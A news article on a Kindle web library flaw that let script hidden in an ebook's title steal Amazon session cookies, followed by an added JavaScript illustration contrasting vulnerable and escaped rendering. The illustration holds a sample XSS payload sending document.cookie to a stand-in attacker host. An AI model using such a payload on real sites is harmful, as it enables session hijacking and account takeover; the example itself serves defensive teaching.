Kindle security flaw 'could let hackers take over your Amazon account' with a malicious ebook

The corrupting influence of fiction is proved once again

The Independent Tech

Most internet users know that illegally downloading movies and music can be a quick way to get viruses on your computer, but now hackers can also exploit a relatively new type of digital contraband: pirated ebooks.

German security researcher Benjamin Daniel Mussler has discovered a vulnerability in Amazon’s Kindle web library that lets an attacker hide malicious code in an ebook’s metadata, specifically its title. When the victim’s Amazon library page displays that title, the code runs in the victim’s browser with the victim’s logged-in session, and can be used to compromise the victim’s Amazon account.

Mr Mussler first came across the issue in October last year and notified Amazon. The company patched the problem within four days but recently re-introduced it after updating its ‘Manage your Kindle’ application. Mr Mussler says that he notified the company once more but, after hearing no reply for several months, decided to go public with the flaw.

“From the [hacker’s] point of view, vulnerabilities like this present an opportunity to gain access to active Amazon accounts,” wrote Mr Mussler on his personal blog, adding that “Users who stick to e-books sold and delivered by Amazon should be safe.”

Thankfully, even for individuals who do fall under the influence of a malicious novel or volume of poetry, the actual damage the hacker can do is mitigated by Amazon’s own security measures.

The Kindle flaw gives an attacker access to a victim’s Amazon account by stealing the session cookie (the small token saved by your browser that tells Amazon’s website that you’re you) rather than the password. That limits the damage: an interloper can only order packages to one of the victim’s saved delivery addresses, because adding a new address requires re-entering credit card details, information that the attack does not expose.
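How a metadata flaw of this kind works, as an added illustration that is not part of the article and is not Amazon’s code: a small JavaScript model of a library page that renders an ebook’s title. The title string, the `attacker.example` host and all function names are constructed for the example. The vulnerable renderer inlines the title straight into HTML, so a title carrying a `<script>` tag executes in the reader’s browser and can read the session cookie; the hardened renderer escapes the title first, and an optional ingest-time check flags titles that look like markup before they are stored.

```javascript
// Added example, not Amazon's code. Models a web "library" page that renders a
// book title taken from e-book metadata. The title below is a constructed,
// attacker-controlled value standing in for the metadata of a pirated file.
const assumedTitle =
  '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>';

// Vulnerable rendering: the title is interpolated into HTML as-is, so the
// browser parses the <script> tag and runs it with the victim's session
// (a stored cross-site scripting flaw).
function renderTitleVulnerable(title) {
  return `<li class="book-title">${title}</li>`;
}

// Escape the five characters that carry meaning in HTML text and attribute
// contexts. '&' must go first so later replacements are not double-escaped.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// Hardened rendering: the same template, but the title is escaped on output,
// so a <script> tag becomes inert text ("&lt;script&gt;...").
function renderTitleSafe(title) {
  return `<li class="book-title">${escapeHtml(title)}</li>`;
}

// Assumed ingest-time check: flag titles that contain what looks like an HTML
// tag ('<' or '</' immediately followed by a tag-name character). HTML tags
// cannot have whitespace after '<', so "A < B" is not flagged. Escaping on
// output remains the real fix; this only keeps obvious payloads out of storage.
function titleLooksLikeMarkup(title) {
  return /<\/?[a-z!?]/i.test(title);
}

// Rough stand-in for what a browser's tokenizer would find: does the rendered
// HTML contain an executable <script ...> start tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Demo: the vulnerable output carries a live script tag, the safe one does not.
console.log(renderTitleVulnerable(assumedTitle));
console.log(renderTitleSafe(assumedTitle));
console.log('flagged at ingest:', titleLooksLikeMarkup(assumedTitle));
```

Run it with `node`. The payload reads `document.cookie`, which is why, as a general web-security practice independent of this article, session cookies are also given the `HttpOnly` flag so that script running in the page cannot read them even if an escaping bug slips through.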

This doesn’t mean that a hacker couldn’t cause quite a bit of trouble (ordering large amounts of items to max out someone’s credit card for example) but as hacks go it's not on the same scale as someone taking over your computer.

At the time of writing Amazon had not responded to requests for comment.

Update: Mr Mussler told The Independent over email that he believes Amazon has now fixed the flaw.